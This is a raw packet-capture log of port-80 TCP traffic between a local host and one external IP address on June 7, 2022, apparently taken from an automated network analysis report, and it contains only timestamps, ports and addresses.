                                                                                                                                                                      Jun 7, 2022 18:45:11.675765991 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675780058 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675797939 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675805092 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675816059 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675832987 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675849915 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675851107 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675869942 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675879955 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675887108 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675905943 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675906897 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675957918 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.678582907 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.678620100 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.678647995 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.678677082 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.678702116 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.678705931 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.678731918 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.684914112 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.684943914 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.684962034 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.684987068 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.685010910 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.685033083 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.685100079 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.696021080 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.696074963 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.696100950 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.696240902 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.703533888 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703564882 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703582048 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703594923 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703613043 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703633070 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703645945 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703663111 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703681946 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703704119 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.703712940 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703736067 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703756094 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703768969 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703782082 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703799009 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703799963 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.703818083 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703820944 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.703830957 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703845024 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703860998 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703876972 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.703881025 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703893900 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703912973 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703921080 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.703932047 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703949928 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703969002 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703988075 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.703990936 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.703999996 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.704011917 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.704019070 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.704034090 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.704037905 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.704056978 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.704071999 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.704076052 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.704093933 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.704107046 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.704112053 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.704135895 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.704139948 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.704159021 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.704163074 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.704178095 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.704214096 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.712574959 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.712610960 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.712634087 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.712651014 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.712677956 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.712702990 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.712822914 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.712872028 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.723691940 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.723731995 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.723757029 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.723783016 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.723808050 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.723831892 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.723840952 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.723870039 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.723906994 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.732240915 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732284069 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732311964 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732335091 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732359886 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732374907 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.732384920 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732405901 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732415915 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.732424021 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732444048 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732462883 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732501030 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732522011 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732539892 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732558966 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732577085 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732601881 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732625008 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732650995 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732677937 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732686043 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.732703924 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732728004 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732734919 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.732750893 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732777119 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732803106 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.732803106 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732857943 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732872963 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.732882977 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732908010 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732933044 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732959032 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.732959032 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732985020 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.732989073 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733011961 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733016968 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733036995 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733056068 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733061075 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733086109 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733109951 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733125925 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733139038 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733160973 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733165979 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733186960 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733213902 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733217955 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733241081 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733256102 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733268023 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733294010 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733305931 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733319998 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733339071 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733365059 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733366966 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733395100 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733422041 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733431101 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733448029 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733468056 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733473063 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733494997 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733520031 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733524084 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733544111 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733567953 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733572006 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733597994 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733618021 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733623028 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733649969 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733669043 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733692884 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733706951 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733720064 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733747005 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733752012 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.733766079 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.733907938 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.735465050 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.735502958 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.735523939 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.735546112 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.735570908 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.735594988 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.735616922 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.735624075 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.735641956 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.735650063 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.735665083 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.735667944 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.735691071 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.735698938 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.735713005 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.735733032 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.735744953 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.735785961 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.735843897 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.736315012 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.736346006 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.736371040 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.736394882 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.736418962 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.736443996 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.736454964 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.736468077 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.736507893 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.736529112 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.736546040 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.736552954 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.736555099 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.736562014 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.736576080 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.736598015 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.736598969 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.736658096 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.750557899 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.761621952 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.762063980 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.762094021 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.762118101 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.762162924 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.762161970 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.762187004 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.762191057 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.762208939 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.762229919 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.762234926 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.762257099 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.762275934 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.762278080 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.762305975 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.762317896 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.762327909 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.762334108 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.762368917 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.765151024 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765181065 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765201092 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765223980 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765247107 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765270948 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765278101 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.765290976 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765301943 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.765312910 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765335083 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765357018 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765379906 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765378952 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.765405893 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765408039 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.765439034 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.765832901 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765856981 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765878916 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765891075 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.765901089 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765919924 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.765923977 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765944958 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765966892 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765988111 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.765990019 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.766000032 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.766011000 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.766033888 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.766056061 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.766077042 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.766077995 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.766119957 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.768460035 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.768512011 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.768522024 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.768542051 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.768568993 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.768588066 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.768599987 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.768646955 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.768650055 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.768671989 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.768695116 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.768698931 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.768724918 CEST8049781185.234.247.119192.168.2.4
